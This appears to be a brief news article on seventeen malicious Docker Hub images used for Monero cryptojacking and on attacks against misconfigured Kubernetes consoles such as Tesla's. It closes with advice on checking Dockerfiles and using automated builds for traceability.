Docker containers make money for cryptomining criminals
Seventeen Docker containers used by cryptomining criminals to make $90,000 in 30 days. The figure may seem tame compared to some of the larger paydays that cryptojackers have earned. But, researchers warn containers are shaping up to be the next ripe target for criminals. Researchers state that the malicious Docker images were pulled down from the Docker Hub image repository. Researchers can't determine for sure how many times the rogue containers were used by Docker Hub users, but researchers estimates that the 17 images were downloaded 5 million times during the year they were available.
All 17 were removed from Docker Hub on May 10 by Docker, after Fortinet found the containers and published a report on the images being used to mine cryptocurrency. Fortinet was able to tie the compromised containers back to one hacker, thanks to a shared Monero wallet. By pushing malicious images to a Docker Hub registry and pulling it from the victim's system, hackers were able to mine 544.74 Monero, which is equal to $90,000.
The report went deeper into the malicious containers found by Fortinet and the larger Docker threat landscape. Of the 17 malicious containers, researchers found nine had the mining software pre-installed. The others were intentionally left misconfigured and available on Docker Hub, allowing the hacker access to the instances at a later date. Each of the images advertised themselves as tools for various popular software products such as Apache Tomcat, MySql and Cron. The growing number of publicly accessible misconfigured orchestration platforms like Kubernetes allows hackers to create a fully automated tool that forces these platforms to mine Monero. Kubernetes is a container orchestration system with tools that automate the deployment, updating and monitoring of containers.
Using public repositories to hide malicious content in plain sight is nothing new. Third-party code repositories such as GitHub, Bitbucket and NuGet Gallery are essential tools to help developers find pre-existing code that adds functionality for their software projects without having to reinvent the wheel. Similarly, Docker Hub offers developers time-saving functions. Both can be targeted by rogue developers.
Researcher stated that the increased attention by hackers to publicly accessible orchestration platforms such as Kubernetes began at the start of 2018, when attackers moved on from Amazon Elastic Compute Cloud exploits to container-specific exploits. Some of those attacks took advantage of hundreds of misconfigured Kubernetes administration consoles. One high-profile attack targeted carmaker Tesla. The hackers had infiltrated Tesla's Kubernetes console, which was not password protected. Within one Kubernetes pod, access credentials were exposed to Tesla's AWS environment, which contained an Amazon S3 bucket that had sensitive data such as telemetry. In addition to the data exposure, hackers were performing crypto mining from within one of Tesla's Kubernetes pods.
Docker does offer tools to its enterprise customers to portect against rough containers. Docker had previously offered security scanning for Docker Hub users, but stopped the free offering in March. There are also numerous free Docker security and scanning tools to choose from. The process of pulling a Docker image has to be transparent and easy to follow. First, you simply try to look through Dockerfile to find out what the FROM and ENTRYPOINT notations are and what the container does. Second, Docker images are built using the Docker automated builds. That's because, with Docker automated builds, you get traceability between the source of the Dockerfile, the version of the image, and the actual build output. Developers need to focus on similar container traceability in a bid to protect their cloud instances.